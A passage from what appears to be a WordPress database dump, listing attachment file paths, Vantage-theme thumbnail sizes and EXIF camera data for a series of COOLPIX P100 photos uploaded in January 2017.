CN3945-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3945-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3945-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3945-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3945-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3945-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473689911\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"187\";s:13:\"shutter_speed\";s:15:\"0.0333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(752,386,'_wp_attached_file','2017/01/DSCN3946.jpg'),(753,386,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3946.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3946-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3946-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3946-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3946-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3946-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3946-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3946-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3946-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3946-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3946-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3946-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3946-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473689920\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"253\";s:13:\"shutter_speed\";s:15:\"0.0333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(754,387,'_wp_attached_file','2017/01/DSCN3947.jpg'),(755,387,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3947.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3947-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3947-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3947-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3947-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3947-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3947-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3947-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3947-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3947-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3947-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3947-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3947-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473690083\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0662251655629\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(756,388,'_wp_attached_file','2017/01/DSCN3948.jpg'),(757,388,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3948.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3948-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3948-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3948-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3948-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3948-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3948-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3948-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3948-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3948-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3948-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3948-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3948-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473690104\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0602409638554\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(758,389,'_wp_attached_file','2017/01/DSCN3949.jpg'),(759,389,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3949.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3949-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3949-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3949-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3949-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3949-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3949-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3949-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3949-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3949-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3949-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3949-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3949-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473690116\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0793650793651\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(760,390,'_wp_attached_file','2017/01/DSCN3950.jpg'),(761,390,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3950.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3950-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3950-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3950-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3950-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3950-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3950-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3950-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3950-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3950-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3950-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3950-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3950-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473690142\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0234741784038\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(762,391,'_wp_attached_file','2017/01/DSCN3952.jpg'),(763,391,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3952.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3952-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3952-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3952-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3952-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3952-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3952-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3952-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3952-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3952-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3952-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3952-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3952-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473690197\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"232\";s:13:\"shutter_speed\";s:15:\"0.0333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(764,392,'_wp_attached_file','2017/01/DSCN3953.jpg'),(765,392,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3953.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3953-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3953-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3953-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3953-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3953-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3953-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3953-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3953-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3953-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3953-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3953-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3953-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473690216\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:6:\"0.0625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(766,393,'_wp_attached_file','2017/01/DSCN3954.jpg'),(767,393,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3954.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3954-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3954-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3954-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3954-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3954-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3954-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3954-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3954-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3954-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3954-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3954-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3954-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473690227\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0404858299595\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(768,394,'_wp_attached_file','2017/01/DSCN3955.jpg'),(769,394,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3955.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3955-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3955-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3955-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3955-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3955-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3955-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-t